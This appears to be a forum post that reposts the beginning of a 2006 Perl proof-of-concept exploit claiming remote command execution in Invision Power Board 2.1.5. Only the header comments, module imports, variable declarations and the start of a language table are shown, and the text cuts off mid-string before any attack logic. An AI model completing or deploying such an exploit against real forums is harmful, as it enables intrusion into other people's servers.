Jump to content
ecstazy_kid

Invision Power 2.1.5

Recommended Posts

Posted

#!/usr/bin/perl

# Wed Apr 26 16:44:15 CEST 2006 jolascoaga@514.es

#

# INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept

#

# remote command execution. vuln credits goes to IceShaman.

#

# works only if you have perms to post a comment. Exploit with replye is

# in my TODO...

#

# 514 still r0xing.

# !dSR the hardc0re hax0rs ;)

# There is no kwel comments in this release, wait for next upgrade

#######################################################################/

use LWP::UserAgent;

use HTTP::Cookies;

use LWP::Simple;

use HTTP::Request::Common "POST";

use HTTP::Response;

use Getopt::Long;

use strict;

$| = 1; # ;1 = |$

my ($proxy,$proxy_user,$proxy_pass,$lang);

my ($arg_host,$debug,$ipb_user,$ipb_pass, $lang, $errors, $topic_index, $tmp_var);

my ($md5_key, $post_key, $tmp_var);

my %lang_es = (

'name' => 'Spanish Language',

'login' => "Ahora est??s identificado",

'incorrect' => "Nombre de usuario o contrase

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...